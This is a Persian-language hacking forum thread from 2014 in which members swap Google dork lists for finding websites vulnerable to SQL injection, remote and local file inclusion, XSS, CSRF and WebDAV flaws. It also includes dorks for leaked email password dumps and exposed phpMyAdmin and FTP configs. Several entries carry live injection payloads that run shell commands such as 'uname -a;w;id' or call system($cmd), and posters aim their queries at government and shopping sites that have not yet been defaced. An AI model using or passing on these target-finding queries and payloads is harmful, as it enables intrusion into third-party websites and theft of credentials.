پیوست شد!

saeid z z z
04-22-2014, 02:35 PM
New Dorks Sql injection

پیوست شد!

mhran2013
04-22-2014, 10:45 PM
مجموعه ای از دورک های sql
[Only registered and activated users can see links]

M@HDI_KING
04-23-2014, 01:17 AM
Sql, rfi, lfi, xss.....

saeid z z z
04-24-2014, 11:13 AM
چننتا دورک برای هک آیدی یاهو:


ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e

ext:sql intext:"INSERT INTO" intext:@hotmail.com intext:password

ext:sql intext:@hotmail.com intext:password

H_SQLI.EMpiRe
05-01-2014, 08:43 PM
Gov Dork


یه لیست 1000 تاییشم اماده میکنم میزارم برای کسایی که گاو بازی میکنند ...



|
|
|
v

پسورد : ashiyane.org

H_SQLI.EMpiRe
05-01-2014, 10:51 PM
LFD dorks







inurl:"dl.php?file="

inurl:"down.php?dd="

inurl:"down.php?name="


inurl:"down.php?downfile"


inurl:"down.php?arq="

inurl:"file.php?src="


inurl:"download.php?file="


inurl:"download.php?src="

inurl:"download.php?url="


inurl:"download.php?f="

inurl:"download.php?book_file="

inurl:"download.php?di_key="


inurl:"download.php?path="

inurl:"download.php?dfile="


inurl:"download.php?get="

inurl:"download.php?u="


inurl:"download.php?downloadFile
"

inurl:"download.php?page=


Jce Dork :


inurl:index.php?option=com_performs upload cv
inurl:"Images/stories/ Site: .com or .ru.il"


اینم have Fun >>-->


inurl:phpmyadmin/index.php & (intext:username & password & "Welcome to")

اینم ربطی با تاپیک نداره ...

برای ftp config


filetype:config inurl:web.config inurl:ftp

cigar

saeid z z z
05-09-2014, 03:20 PM
دورود...
اینم یه سری دورک جدید برا شما..

موفق باشید!

MR.TEKIDE
05-10-2014, 11:07 AM
اهل دروک نیستیم اما برای کمک به دوستان ..

شایدم تکراری باشه
rfi dork


/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/phpopenchat/contrib/yabbse/poc.php?sourcedir=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
([Only registered and activated users can see links] => intitle:PHPOpenChat exthp)
/calendar/calendar.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/functions/popup.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/datePicker.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/setupSQL.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
([Only registered and activated users can see links] => intitle:"EasyPHPCalendar" exthp)
/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
/zentrack/index.php?configFile=
/pivot/modules/module_db.php?pivot_path=
/inc/header.php/step_one.php?server_inc=
/install/index.php?lng=../../include/main.inc&G_PATH=
/inc/pipe.php?HCL_path=
/include/write.php?dir=
/include/new-visitor.inc.php?lvc_include_dir=
/includes/header.php?systempath=
/support/mailling/maillist/inc/initdb.php?absolute_path=
/coppercop/theme.php?THEME_DIR=
/zentrack/index.php?configFile=
/pivot/modules/module_db.php?pivot_path=
/inc/header.php/step_one.php?server_inc=
/install/index.php?lng=../../include/main.inc&G_PATH=
/inc/pipe.php?HCL_path=
/include/write.php?dir=
/include/new-visitor.inc.php?lvc_include_dir=
/includes/header.php?systempath=
/support/mailling/maillist/inc/initdb.php?absolute_path=
/coppercop/theme.php?THEME_DIR=
/becommunity/community/index.php?pageurl=
/shoutbox/expanded.php?conf=
/agendax/addevent.inc.php?agendax_path=
/myPHPCalendar/admin.php?cal_dir=
/yabbse/Sources/Packages.php?sourcedir=
/zboard/zboard.php
/path_of_cpcommerce/_functions.php?prefix
/dotproject/modules/projects/addedit.php?root_dir=
/dotproject/modules/projects/view.php?root_dir=
/dotproject/modules/projects/vw_files.php?root_dir=
/dotproject/modules/tasks/addedit.php?root_dir=
/dotproject/modules/tasks/viewgantt.php?root_dir=
/My_eGallery/public/displayCategory.php?basepath=
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/agendax/addevent.inc.php?agendax_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/mod_mainmenu.php?mosConfig_absolute_path=

saeid z z z
05-12-2014, 04:44 PM
sql-i 2014

saeid z z z
05-14-2014, 12:53 PM
rfi دووورک

soniya1998
05-21-2014, 05:34 PM
دورک های باگ csrf کسی نداره ؟؟

mgolbaz
05-24-2014, 09:27 PM
درود
دوستان دورک RFU میشه بذارید؟برای اینکه اسپم نشه خودم یدونه دارم میذارم:تشکر فراموش نشه
"/inurl:"editor/filemanager/connectors/php/userfiles

Just Hacker
05-30-2014, 05:46 PM
دروک باگ csrf :| کسی نداره دوستان بده
یا webdav

H_SQLI.EMpiRe
05-30-2014, 05:58 PM
دروک باگ csrf :| کسی نداره دوستان بده
یا webdav


کافیه سرچ کنید دوست من //

wevdave :



intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:gov
intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:YOURCOUNTRY

intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache"

or

intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:edu

or intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:gov

or intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:YOURCOUNTRY[/LEFT]

intitle:"Directory Listing For /" + inurl:webdav tomcat
intitle:"Directory Listing For /" + inurl:webdav

intitle:"Directory Listing For /" + inurl:webdav tomcat

intitle:"Directory Listing For /" + inurl:webdav



inurl:*.edu/*.asp

inurl:.gov.*/*.asp

inurl:*.gov/*.asp

inurl:.org/*.asp

inurl:.ag/*.asp

inurl:.it/*.asp

inurl:.uk/*.asp

inurl:.co.il/*.asp

inurl:.com/*.asp

inurl:.co.id/*.asp

inurl:.ah.cn/*.asp

inurl:.bj.cn/*.asp

inurl:.cq.cn/*.asp

inurl:.fj.cn/*.asp

inurl:.gd.cn/*.asp

inurl:.gs.cn/*.asp

inurl:.gz.cn/*.asp

inurl:.gx.cn/*.asp

inurl:.ha.cn/*.asp

inurl:.hb.cn/*.asp

inurl:.he.cn/*.asp

inurl:.hi.cn/*.asp

inurl:.hl.cn/*.asp

inurl:.hn.cn/*.asp

inurl:.jl.cn/*.asp

inurl:.js.cn/*.asp

inurl:.jx.cn/*.asp

inurl:.ln.cn/*.asp

inurl:.nm.cn/*.asp

inurl:.nx.cn/*.asp

inurl:.qh.cn/*.asp

inurl:.sc.cn/*.asp

inurl:.sd.cn/*.asp

inurl:.sh.cn/*.asp

inurl:.sn.cn/*.asp

inurl:.sx.cn/*.asp

inurl:.tj.cn/*.asp

inurl:.tw.cn/*.asp

inurl:.xj.cn/*.asp

inurl:.xz.cn/*.asp

inurl:.yn.cn/*.asp

inurl:.zj.cn/*.asp

inurl:.ac.cn/*.asp




title:welcome.to.IIS.4.0

OR

allintitle:Welcome to Windows NT 4.0 Option Pack

IIS 5.0

allintitle:Welcome to Windows 2000 Internet Services

IIS 6.0

ّبرای CSRF بهتره از این سایت ها استفاده کنید //


[Only registered and activated users can see links]


[Only registered and activated users can see links]




یا حق //

Big Banger
05-30-2014, 06:14 PM
@@@ COPY RIGHT @@@

[Only registered and activated users can see links]

IrTrojan
05-30-2014, 06:20 PM
sql-i 2014
این دارک تکراریه قبلا گذاشته شده

saeid z z z
06-04-2014, 04:25 PM
sql


intitle:Admin inurl:login.php site:.co.in
intitle:not accepted inurl:"union select" inurl:"id?="
allinurl:"zimbra/?zinitmode=http" -google -github
intext:"Access denied for" intitle:"Shopping cart"
allinurl:/hide_my_wp=
inurl:"/reports/rwservlet" intext:"Oracle"
intitle:"pChart 2.x - examples" intext:"2.1.3"
"[function.getimagesize]: failed to open stream: No such file or directory in"
site:bitbucket.org inurl:.bash_history
allinurl:"/main/auth/profile.php" -github -google

saeed209
06-13-2014, 12:08 AM
کار دستِ:دی
اگه تکراری نباشه
sql

inurl:/group.php?mgid=

ali00rr
06-17-2014, 05:38 PM
با سلام

دوستان من چنتا دورک sql جدید میخواستم اگه کسی داره بذاره تمام دورک های گذاشته شده سایت هایی که باهاش پیدا میشه قبلا در zone-h ثبت شدن لطفا دورک جدید اگه دارید بذارید ممنون میشم.

greendel
06-17-2014, 06:14 PM
با سلام

دوستان من چنتا دورک sql جدید میخواستم اگه کسی داره بذاره تمام دورک های گذاشته شده سایت هایی که باهاش پیدا میشه قبلا در zone-h ثبت شدن لطفا دورک جدید اگه دارید بذارید ممنون میشم.


inurl:read.php?id=


4,770,000 results

خیلیاش هنوز نخوردن..

greendel
06-17-2014, 06:20 PM
یه سری دروک جدید:94:

شل b374k


Jayalah Indonesiaku ©2014 b374k

و یک sql


inurl:hom001.php?id=

H_SQLI.EMpiRe
06-25-2014, 05:01 AM
!)-(


چند دورک رو که بسیار استفاده میکردم و باگ های جالبی از این دورک ها بیرون اومده


البته بهتره تست کنید تا ببینید ../



/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=
/language/lang_german/lang_main_album.php?phpbb_root_path=
link_main.php?phpbb_root_path=
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=
MOD_forum_fields_parse.php?phpbb_root_path=
/codebb/pass_code.php?phpbb_root_path=
/codebb/lang_select?phpbb_root_path=
includes/functions_nomoketos_rules.php?phpbb_root_path=
includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/ezconvert/config.php?ezconvert_dir=
/includes/class_template.php?phpbb_root_path=
/includes/usercp_viewprofile.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
menu.php?sesion_idioma=
/includes/functions.php?phpbb_root_path=
/admin/admin_linkdb.php?phpbb_root_path=
/admin/admin_forum_prune.php?phpbb_root_path=
/admin/admin_extensions.php?phpbb_root_path=
/admin/admin_board.php?phpbb_root_path=
/admin/admin_attachments.php?phpbb_root_path=
/admin/admin_users.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/admin/modules_data.php?phpbb_root_path=
/faq.php?foing_root_path=
/index.php?foing_root_path=
/list.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/gen_m3u.php?foing_root_path=
/view_artist.php?foing_root_path=
/view_song.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/flash/set_na.php?foing_root_path=
/flash/initialise.php?foing_root_path=
/flash/get_song.php?foing_root_path=
/includes/common.php?foing_root_path=
/admin/nav.php?foing_root_path=
/admin/main.php?foing_root_path=
/admin/list_artists.php?foing_root_path=
/admin/index.php?foing_root_path=
/admin/genres.php?foing_root_path=
/admin/edit_artist.php?foing_root_path=
/admin/edit_album.php?foing_root_path=
/admin/config.php?foing_root_path=
/admin/admin_status.php?foing_root_path=
language/lang_english/lang_prillian_faq.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/language/lang_french/lang_prillian_faq.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/functions_rpg_events.php?phpbb_root_path=
/admin/admin_spam.php?phpbb_root_path=
/includes/functions_newshr.php?phpbb_root_path=
/zufallscodepart.php?phpbb_root_path=
/mods/iai/includes/constants.php?phpbb_root_path=
/root/includes/antispam.php?phpbb_root_path=
/phpBB2/shoutbox.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/journals_delete.php?phpbb_root_path=
/includes/journals_post.php?phpbb_root_path=
/includes/journals_edit.php?phpbb_root_path=
/includes/functions_num_image.php?phpbb_root_path=
/includes/functions_user_viewed_posts.php?phpbb_root_path=
/includes/themen_portal_mitte.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/functions_static_topics.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=pagestar t&phpbb_root_path=
/includes/functions_kb.php?phpbb_root_path=
/includes/bbcb_mg.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=
/includes/pafiledb_constants.php?module_root_path=
/index.php?phpbb_root_path=
/song.php?phpbb_root_path=
/faq.php?phpbb_root_path=
/list.php?phpbb_root_path=
/gen_m3u.php?phpbb_root_path=
/playlist.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/modules/Forums/admin/index.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_board.php?phpbb_root_path=
/modules/Forums/admin/admin_disallow.php?phpbb_root_path=
/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=
/modules/Forums/admin/admin_groups.php?phpbb_root_path=
/modules/Forums/admin/admin_ranks.php?phpbb_root_path=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=
/modules/Forums/admin/admin_words.php?phpbb_root_path=
/modules/Forums/admin/admin_avatar.php?phpbb_root_path=
/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=
/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=
/modules/Forums/admin/admin_forums.php?phpbb_root_path=
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=
/modules/Forums/admin/admin_smilies.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_users.php?phpbb_root_path=
/stat_modules/users_age/module.php?phpbb_root_path=
/includes/functions_cms.php?phpbb_root_path=
/m2f/m2f_phpbb204.php?m2f_root_path=
/m2f/m2f_forum.php?m2f_root_path=
/m2f/m2f_mailinglist.php?m2f_root_path=
/m2f/m2f_cron.php?m2f_root_path=
/lib/phpbb.php?subdir=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_admin.php?phpbb_root_path=
/toplist.php?f=toplist_top10&phpbb_root_path=
/admin/addentry.php?phpbb_root_path=
/includes/kb_constants.php?module_root_path=
/auth/auth.php?phpbb_root_path=
/auth/auth_phpbb/phpbb_root_path=
/auction/auction_common.php?phpbb_root_path=
/auth/auth_SMF/smf_root_path=

yoosef6
06-25-2014, 08:21 AM
برو داخل سایت [Only registered and activated users can see links] ([Only registered and activated users can see links]) هست .

saeid z z z
06-25-2014, 09:16 AM
RFI DoRk


inurl:/modules/My_eGallery/public/displayCategory.php?basepath=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.dk

allinurl:/index.php?file= site:*.dk

INURL OR ALLINURL WITH:

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=

14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup %5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup %5d=include($_GET%5ba%5d);&a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html
/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=
/application.php?base_path=

23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=

24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=

26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=

27. allinurl:/forum/
/forum/admin/index.php?inc_conf=

28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=

30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : "Powered by iUser"
/common.php?include_path=

32. allinurl: "static.php?load="
/static.php?load=

33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=

inurl:"/lire.php?rub="

inurl:"/os/pointer.php?url="

inurl:"folder.php?id="

inurl:"show.php?page="

inurl:"index2.php?DoAction="

inurl:"index.php?canal="

inurl:"index.php?screen="

inurl:"index.php?langc="

inurl:"index.php?Language="

inurl:"view.php?page="

dork: "powered by doodle cart"
rfi of this dork: enc/content.php?Home_Path=

dork: "Login to Calendar"
rfi of this dork: /embed/day.php?path=

dork: "powered by EQdkp"
rfi of this dork: /includes/dbal.php?eqdkp_root_path=

inurl:"template.php?goto="

inurl:"video.php?content="

inurl:"pages.php?page="

inurl:"index1.php?choix="

inurl:"index1.php?menu="

inurl:"index2.php?ascii_seite="

dork: inurl:surveys
rfi to this dork: /surveys/survey.inc.php?path=

inurl:"index.php?body="

dork: allinurl:adobt sitel
rfi to this dork: /classes/adodbt/sql.php?classes_dir=

dork: "Powered By ScozNews"
rfi to this dork: /sources/functions.php?CONFIG[main_path]=
rfi to this dork: /sources/template.php?CONFIG[main_path]=

inurl:"kb_constants.php?module_root_path="

dork: allinurl:"mcf.php"
rfi to this dork: /mcf.php?content=

dork: inurl:"main.php?sayfa="
rfi to this dork: /main.php?sayfa=

dork: "MobilePublisherPHP"
rfi to this dork: /header.php?abspath=

dork: "powered by phpCOIN 1.2.3"
rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=

allinurl:login.php?dir=

inurl:"index.php?go="

inurl:"index1.php?="

inurl:"lib/gore.php?libpath="

inurl:"index2.php?p="

amirmahmood
06-29-2014, 07:45 PM
csrf dorks


inurl:/browser
inurl:diff()
inurl:/log/subversion/
inurl:/report/7
inurl:/roadmap
inurl:/milestone/later
inurl:/changest

configuration file for slapd

/attachment/wiki/Howto_Config/Ldap/slapd.conf.

php error message

"Warning: Cannot modify header information - headers already sent"

:48:

amirmahmood
06-29-2014, 07:51 PM
php webmail

/browser/github/plugins/newmail_notifier/newmail_notifier.php.

/browser/github/program/lib/Roundcube/rcube_washtml.php.
/changeset/35c135bce14d6c2260ff396b7087cd5ceed074b7/github/program/lib/Roundcube/rcube_imap.php.
filetype:php login intitle:"phpWebMail|WebMail"

possible sensitive file (slapd.conf)

filetype:conf slapd.conf
internal server error

"Internal Server Error" "server at"
:48:

greendel
06-29-2014, 07:54 PM
inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/Buy Now/"+site:.net
inurl:".php?cid="+intext:"online+betting"
inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"
inurl:".php?cid="

amirmahmood
07-07-2014, 12:33 PM
سلام دوباره به همه یه دوستان اشیانه ای./
امیدورام که نماز و روزه هاتون مورد قبول درگاه الهی واقع بشه. امروز واستون یه سری دورک اماده کردم دورک ها پرایویت (0day) هرکی استفاده نکنه ضرر کرده هم واسه وردپرس هست هم یه دورک multiple واسه xss وcsrf در مجموع دورک هاش بیش تر درک هاش واسه csrf هستش./
سطحش هم فوق حرقه ای هست استفاده کنید حالشو ببرید جدید جدیده./


inurl:"Powered by: PHP Link Directory"
inurl:"Powered by YourTube v1.0"
inurl:"Powered by CubeCart 3.0.4"
for wordpress:
inurl:"/wp-content/themes/agritourismo-theme/"
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"
PHP Melody 1.9 CSRF vulnerabilitie:
intext:"PHP Melody 1.9 powered by PHP Melody."
bloofoxCMS 0.5.0 CSRF / PHP Code Injection:
"Powered by bloofoxCMS"

--------------------------------------------------------------------------------------------------
اینم واسه باگ پرایویت WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability
"Powered by WHMCompleteSolution" or inurl:WHMCS

amirmahmood
07-07-2014, 01:01 PM
بازم سلام./
بچه می گفتن که ما می خوایم با دورک های جدید sql بزنیم اما دورک ها دیگه کارایی خودشون رو از دست دادن یه سری دورک می زارم که عمرن هیچ جای انجمن گذاشته نشده./
شما فقط اگه تونستین رو دکمه تشکر کلیک کنید خیلی بیشتر واستون دورک میزارم هر چی که اصلا شما خواستید./
این سری از دورک هام بیش تر sql هست فط رو دکمه تشکر کلیک کنید بقیش با من روزانه واستون 20 تا دورک میزارم./
priv8=publick
:x

Sql Injection on CMS Assesi:

dork:intext:Assesi - Assessoria e Sistemas + vereadores.php
++++++++++++++++++++++++++++++++++++++++++++++
another priv8 dorks:
Dork: intext:Deze website werd ontwikkeld door KvW IT Solutions & inurl:.php?id=
Dork: intext:Réalisation du site Internet par Imaweb
Dork: intext:" Web Design by Mistera"
Dork: inurl:/mod_newsletter/preview.php?action=
Dork: inurl:"php?id=" intext:"Copyright by Centro Studi Airone"
Dork: inurl:/cgilua.exe/sys/
Dork: inurl:ajaxfs.php
Dork: intitle:Testa Online Test Management System
Dork: inurl:blog/blog.php?blogId=1 inurl:categoryId=
Dork: intext:"CityVariety Corporation" inurl:"id="
Dork: "Powered by Soluzione-web" inurl:Pagina.asp?ID=
Dork: "Powered by Internetimage.it" inurl:default.asp?id
Dork: intext:"realizat de Web4Future"
Dork: "Design by Agent Image - Real Estate Web Design. " inurl:"id="
Dork: "powered by smart-info ltd" inurl:"id="
Dork: intext:"Powered by Binary Systems and Networks"
Dork: "Powered By : Web Design Gurgaon" inurl:news.php?id=
Dork: intext:"Web Design by Roman Design"
Dork: allintext:"Powered by phpLiteAdmin | "
Dork: inurl:img= or Invision Gallery 2.0.5 IPS, Inc. inurl:img=
Dork: inurl:"Powered by dedalus.cc" inurl:index.php?id=
Dork: "Powered by Studio G&G Corporate Communication" inurl:index.php?lang=
--------------------------------------------------------------------------------------
sqli/lfi:Dork: inurl:"mostra_sorgente.php"
--------------------------------------------------------------------------------------
xss/sql:
Dork: intext:"Created by Enigmatis" inurl:"pl/?pid="
Dork: intext:"Powered by Artak Solution

amirmahmood
07-07-2014, 03:58 PM
